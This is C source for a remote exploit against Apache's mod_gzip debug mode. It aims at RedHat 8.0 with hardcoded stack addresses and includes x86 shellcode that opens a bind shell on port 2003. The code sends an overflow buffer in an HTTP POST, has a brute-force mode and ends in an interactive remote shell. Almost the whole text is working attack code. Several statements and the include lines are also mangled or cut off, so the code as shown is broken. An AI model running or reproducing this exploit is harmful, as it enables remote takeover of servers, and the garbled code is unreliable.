/*
\ [exploit code] for mod_gzip (with debug_mode)
#include
#include
#include
#include
#include
#include
#include
#include
#define STEP 1000
char fmt[] =
"POST /?%s HTTP/1.1\r\n"
"Content-Type: text/html\r\n"
"Host: %s\r\n"
"Content-Length: %d\r\n"
"Accept-Encoding: gzip, deflate\r\n\r\n"
"%s\r\n\r\n";
struct TARGETS {
char *distr;
long ret;
long std_err;
char *shellcode;
char *jmp;
} targets[] = {
/* you can add targets here */
{"RedHat 8.0 (Psyche)", // disributive info
0xbfffd8f0, // return address in stack
0x42127480, // address of stderr
//shellcode for Linux x86 -> bind shell on 2003 port//
"\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
"\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
"\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
"\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
"\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
"\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80",
/*
special jump instruction (to avoid bad characters in url):
(jump on our shellcode into heap)
movl $0xa1a51baa,%ebx
addl $0x66666666,%ebx
jmp *%ebx
*/
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x66\x66\x66\x66\xff\xe3"
} };
long getip(char *hostname) {
struct hostent *he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) h_addr, he->h_length);
}
return ipaddr;
}
void usage(char *prog) {
int i=0;
printf("\nUsage: %s [-p port] [-t target] [-r manual_retaddr] [-b addr] [-s step_num]\n\nTargets:\n",prog);
while(targets[i++].distr) printf("\t[%d] -> %s\n",i-1,targets[i-1].distr);
printf("\n");
exit(0);
}
int main(int argc, char **argv) {
int i=0;
struct sockaddr_in sockstruct;
struct hostent *HOST;
char tmp[20000];
char buf1[5000],buf2[10000];
int sock;
fd_set rset;
int port=80,shellport=2003;
int step=STEP;
char *victim=NULL;
long ret=0xbfffffff,ret_err;
int brutemode=0;
char *shellcode,*jmp;
int trg=0;
printf("\nremote exploit for mod_gzip (debug_mode) [Linux/*BSD]\n\t\t by xCrZx [] /05.06.03/\n");
for(i=0;i-1) {
if(!brutemode)printf("[+] Connected!\n",i);
memset(tmp ,0x00,sizeof tmp );
memset(buf1,0x00,sizeof buf1);
memset(buf2,0x00,sizeof buf2);
memset(buf1,0x90,2016);
memcpy(buf1+strlen(buf1),jmp,strlen(jmp));
memset(buf1+strlen(buf1),0x90,2280);
*(long *)&buf1[strlen(buf1)]=ret_err;
for(i=0;i-1) {
printf("\n[!] Shell is accessible!\n\n");
write(sock, "id;uname -a\n", 12);
while (1) {
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock + 1, &rset, NULL, NULL, NULL);
if (FD_ISSET(sock, &rset)) {
i = read(sock, tmp, sizeof(tmp) - 1);
if (i 0) {
tmp[i]=0;
write(sock, tmp, i);
}
}
}
} else if(!brutemode)printf("[x] Shell is inaccessible..\n\n");
close(sock);
} while ( brutemode );
return 0;
}
